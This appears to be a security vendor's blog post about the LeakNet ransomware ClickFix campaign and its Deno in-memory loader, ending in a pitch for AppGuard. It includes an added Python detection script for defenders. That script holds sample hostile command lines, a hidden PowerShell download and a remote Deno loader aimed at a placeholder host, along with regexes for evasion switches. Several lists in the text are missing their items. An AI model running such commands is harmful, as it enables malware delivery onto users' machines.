Cyber attackers continue to evolve faster than many traditional security models can keep up with. A recent campaign involving the LeakNet ransomware group shows how modern adversaries are combining social engineering, trusted system tools, and in-memory execution techniques to bypass defenses and quietly move toward full encryption of enterprise environments.
As detailed in The Hacker News report, LeakNet has adopted a ClickFix-based attack chain delivered through compromised websites, paired with a Deno-based in-memory loader that executes malicious code directly inside the system without leaving obvious forensic traces on disk.
This combination significantly reduces detection opportunities and highlights a critical gap in traditional endpoint security approaches.
The ClickFix technique is a social engineering method that tricks users into believing there is a system or browser issue that needs immediate correction. Victims are instructed to copy a command and execute it themselves, typically through the Windows Run dialog or PowerShell.
In the LeakNet campaign, users are redirected from legitimate but compromised websites to fake verification or CAPTCHA-style pages. These pages then instruct users to manually run commands that initiate malware execution.
This is not a technical exploit in the traditional sense. It is a manipulation of human trust combined with legitimate Windows tools.
Once the user executes the command, the attack chain begins immediately.
One of the most concerning aspects of this campaign is the use of a Deno-based loader to execute malicious JavaScript or TypeScript payloads directly in memory.
According to the analysis, this approach allows attackers to:
This approach is part of a broader trend where attackers rely on legitimate frameworks and runtimes to disguise malicious activity as normal system behavior.
Once inside the environment, LeakNet proceeds through credential discovery, lateral movement, and data staging before ransomware deployment.
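The two stages described above, a user-launched shell from the Run dialog or PowerShell and a Deno runtime pulling a remote module, both leave a trace in process-creation telemetry even when nothing malicious is written to disk. The following is an added detection example, not code from the original post or from the report it cites; the record fields, the evasion switches treated as indicators, and the sample events (using the reserved example.invalid name) are all assumptions constructed for illustration.

```python
"""Added example (constructed): flag ClickFix-style process launches in Windows
process-creation telemetry. Field names and sample events are assumptions."""
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:
    """Minimal view of a Sysmon Event ID 1 / Security 4688 record (assumed fields)."""
    parent: str   # full path of the parent process image
    image: str    # full path of the created process image
    cmdline: str  # command line of the created process

# Interpreters a pasted Run-dialog or PowerShell command typically lands in.
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe"}
# A remote module or download target on the command line.
REMOTE = re.compile(r"https?://", re.I)
# Common evasion switches (assumed generic indicators, not campaign-specific).
EVASION = re.compile(r"-w(indowstyle)?\s+hidden|-ep\s+bypass|\biex\b|invoke-expression", re.I)

def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]

def classify(ev: ProcEvent) -> list[str]:
    """Return why an event looks like a ClickFix / in-memory-loader step ([] if benign)."""
    reasons = []
    image, parent = _basename(ev.image), _basename(ev.parent)
    # explorer.exe as parent means the user launched it (Run dialog, pasted command).
    if image in SHELLS and parent == "explorer.exe":
        if REMOTE.search(ev.cmdline):
            reasons.append("user-launched shell fetching remote content")
        if EVASION.search(ev.cmdline):
            reasons.append("user-launched shell with evasion switches")
    # Deno pulling a remote module: only the trusted runtime binary touches disk.
    if image == "deno.exe" and REMOTE.search(ev.cmdline):
        reasons.append("deno running a remote module (in-memory loader pattern)")
    return reasons

def scan(events: list[ProcEvent]) -> dict[int, list[str]]:
    """Map event index -> reasons for every flagged event in a batch."""
    return {i: r for i, ev in enumerate(events) if (r := classify(ev))}

# Constructed sample telemetry; example.invalid is a reserved, non-resolving name.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE = [
    ProcEvent(r"C:\Windows\explorer.exe", PS, 'powershell.exe -w hidden -ep bypass -c "iwr https://example.invalid/verify"'),
    ProcEvent(r"C:\Windows\explorer.exe", PS, r"powershell.exe -Command Get-ChildItem C:\Users"),
    ProcEvent(PS, r"C:\Users\u\.deno\bin\deno.exe", "deno.exe run -A https://example.invalid/loader.ts"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Users\u\.deno\bin\deno.exe", "deno.exe run main.ts"),
]
```

Running `scan(SAMPLE)` flags the first and third events and leaves the ordinary PowerShell and local Deno launches alone; in a real pipeline the same logic would run over the parsed event stream rather than the embedded list.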
Most legacy endpoint security tools are built around a Detect and Respond philosophy. They assume that:
LeakNet style attacks expose the weakness in that assumption.
By the time detection occurs:
Detection is no longer early enough to prevent impact. It only confirms that compromise has already happened.
What makes ClickFix particularly effective is that it does not rely on software vulnerabilities.
Instead, it abuses three trusted layers:
This means even fully patched environments remain exposed because the attack does not need a software flaw. It only needs a user to execute a command.
This is where the security model needs to shift.
The goal can no longer be simply detecting malicious behavior. The goal must be preventing malicious code from executing meaningful actions in the first place.
A modern approach requires Isolation and Containment, where:
Instead of trying to identify every possible attack variation, the system limits what any unknown or untrusted code can do.
This fundamentally changes the outcome of attacks like ClickFix, because even if the user is tricked, the payload cannot fully execute its intended behavior.
AppGuard is designed around this exact shift in security thinking.
Rather than relying on signature-based detection or post-execution analysis, AppGuard enforces policy-based control of applications and processes. This helps prevent malicious code from gaining the ability to execute destructive actions, even if it is already present on the system.
With a 10-year proven track record in production environments, AppGuard focuses on:
In scenarios like LeakNet's ClickFix attacks, this means that even if a user is tricked into running a command, the resulting payload is far less likely to gain the access needed to move forward in the attack chain.
LeakNet's adoption of ClickFix and in-memory loaders is another clear signal that ransomware operators are prioritizing stealth, legitimacy, and user manipulation over traditional exploit-based entry points.
Security teams that continue to rely only on Detect and Respond models are operating at a disadvantage. The attack is already inside the environment by the time it is detected.
The shift needs to happen now.
From detection-focused security
To prevention through isolation and containment
Business owners and security leaders should consider how their current endpoint protection strategy would respond to an attack like LeakNet's ClickFix campaign.
At CHIPS, we help organizations move beyond reactive security and toward a model built on Isolation and Containment using AppGuard, a proven endpoint protection solution with a decade of real-world success.
If you want to understand how to reduce the impact of ransomware threats like this before they execute, talk with us at CHIPS about how AppGuard can strengthen your security posture and help prevent these types of incidents from becoming business-disrupting events.